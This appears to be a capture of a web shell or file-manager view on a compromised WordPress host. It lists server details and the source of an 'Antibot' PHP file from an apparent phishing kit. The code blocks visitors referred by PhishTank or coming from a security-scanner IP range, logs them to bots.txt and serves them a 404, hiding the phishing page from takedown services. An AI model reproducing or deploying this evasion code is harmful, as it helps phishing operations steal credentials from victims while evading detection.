uawdijnntqw1x1x1
IP : 216.73.216.126
Hostname : webm002.cluster126.gra.hosting.ovh.net
Kernel : Linux webm002.cluster126.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
OS : Linux
PATH:
/
home
/
.
/
monikamovk
/
www
/
wp-includes
/
..
/
bigb
/
assets
/
Antibot
/
Dila_DZ.php
/
/
<?php ### Perform a HTTP REFERER check on the visitor to see if they are coming from the Phishtank website ### if(isset($_SERVER['HTTP_REFERER'])) { if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'phishtank.com') { $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n"; $save=fopen("./bots.txt","a+"); fwrite($save,$content); fclose($save); header("HTTP/1.0 404 Not Found");exit(); } } if(isset($_SERVER['HTTP_REFERER'])) { if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.phishtank.com') { $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n"; $save=fopen("./bots.txt","a+"); fwrite($save,$content); fclose($save); header("HTTP/1.0 404 Not Found");exit(); } } ### Check if the ip between 146.112.0.0 And 146.112.255.255 ### $range_start = ip2long("146.112.0.0"); $range_end = ip2long("146.112.255.255"); $ip2long = ip2long($_SERVER['REMOTE_ADDR']); if ($ip2long >= $range_start && $ip2long <= $range_end){ $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Blacklist ] \r\n"; $save=fopen("./bots.txt","a+"); fwrite($save,$content); fclose($save); header("HTTP/1.0 404 Not Found");exit(); } ?>
/home/./monikamovk/www/wp-includes/../bigb/assets/Antibot/Dila_DZ.php